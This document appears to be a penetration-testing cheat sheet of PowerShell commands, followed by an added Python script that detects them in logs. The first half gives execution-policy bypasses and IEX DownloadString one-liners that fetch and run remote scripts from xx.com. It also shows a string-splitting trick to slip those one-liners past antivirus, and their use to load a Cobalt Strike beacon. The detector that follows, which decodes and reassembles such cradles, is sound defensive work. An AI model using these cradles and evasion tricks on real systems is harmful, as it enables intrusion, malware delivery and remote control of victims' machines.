Common PowerShell commands for penetration testing
Set-ExecutionPolicy RemoteSigned   # allow scripts to run
Set-ExecutionPolicy Restricted     # restrict script execution again
Download a file from a remote host
powershell
$h=new-object System.Net.WebClient
$h.DownloadFile('http://xx.com/payload/shell/h.sh','C:\Users\xx\Desktop\test\h.sh')
Run a .ps1 file from the command line
powershell.exe -ExecutionPolicy bypass -File "C:\Users\xx\Desktop\test\1.ps1"
Download and execute remotely
Contents of the whoami.ps1 file
## check the current privileges
$command = "whoami"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)   # -encodedCommand expects base64 of the UTF-16LE (Unicode) bytes
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -encodedCommand $encodedCommand
Running it as-is gets blocked by AV
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xx.com/payload/powershell/whoami.ps1')"
Bypass
First split the command into string fragments, then concatenate them back together
powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xx.com/payload/powershell/whoami.ps1'')'.Replace('11','adString');IEX ($a+$b)"
Checking in to CS (Cobalt Strike)
Plain PowerShell command
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xx.com/payload/powershell/muet.ps1')"
Split command
powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xx.com/payload/powershell/muet.ps1'')'.Replace('11','adString');IEX ($a+$b)"
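Both split-and-concatenate one-liners above (the whoami.ps1 and muet.ps1 variants) only keep the literal DownloadString out of the command line; once IEX runs the joined string, Script Block Logging (Event ID 4104) records the reassembled cradle, and a process-creation log can be normalised the same way. The following Python is an added defender-side example, not code from the original page: it decodes -EncodedCommand payloads, rebuilds .Replace() and $a+$b fragments, and flags the cradle over constructed sample log lines (the host xx.com and paths are taken from the page's own examples).

```python
import base64
import re

# Constructed sample command lines (process-creation / script-block log style), modelled on this page's one-liners.
SAMPLE_LOGS = [
    "powershell.exe -ExecutionPolicy bypass -File C:\\Users\\xx\\Desktop\\test\\1.ps1",
    "powershell.exe -encodedCommand dwBoAG8AYQBtAGkA",
    "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://xx.com/payload/powershell/whoami.ps1')\"",
    "powershell \"$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xx.com/payload/powershell/whoami.ps1'')'"
    ".Replace('11','adString');IEX ($a+$b)\"",
    "powershell -NoProfile Get-ChildItem C:\\Windows",
]

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -e / -enc / -EncodedCommand, or None."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def rebuild_fragments(cmdline):
    """Best effort: apply literal .Replace() calls and join ($a+$b) fragments so the real cradle shows."""
    text = re.sub(r"'((?:[^']|'')*)'\.Replace\('([^']*)','([^']*)'\)",
                  lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", cmdline, flags=re.I)
    assigns = {k: v.replace("''", "'")  # '' inside a single-quoted PowerShell string is an escaped quote
               for k, v in re.findall(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'", text)}
    return re.sub(r"\(\s*(\$\w+(?:\s*\+\s*\$\w+)+)\s*\)",
                  lambda m: "".join(assigns.get(p, "$" + p) for p in re.findall(r"\$(\w+)", m.group(1))), text)

def analyse(cmdline):
    """Return the reasons a command line looks like a download cradle (empty list = nothing found)."""
    reasons, decoded = [], decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command: " + decoded)
    raw = cmdline + " " + (decoded or "")          # inspect the decoded payload as well
    text = rebuild_fragments(raw)
    if re.search(r"\biex\b|invoke-expression", text, re.I):
        reasons.append("Invoke-Expression / IEX")
    if re.search(r"net\.webclient|download(?:string|file)\s*\(", text, re.I):
        reasons.append("WebClient download cradle")
    if re.search(r"-e(?:xecutionpolicy|p)\s+bypass", text, re.I):
        reasons.append("execution policy bypass")
    if text != raw:
        reasons.append("string fragments rebuilt: " + text)
    return reasons

if __name__ == "__main__":
    print(*[analyse(line) or "nothing found" for line in SAMPLE_LOGS], sep="\n")
```

The rebuilt text for the fourth sample contains the full DownloadString call, which is exactly what the 4104 event would show after IEX evaluates it.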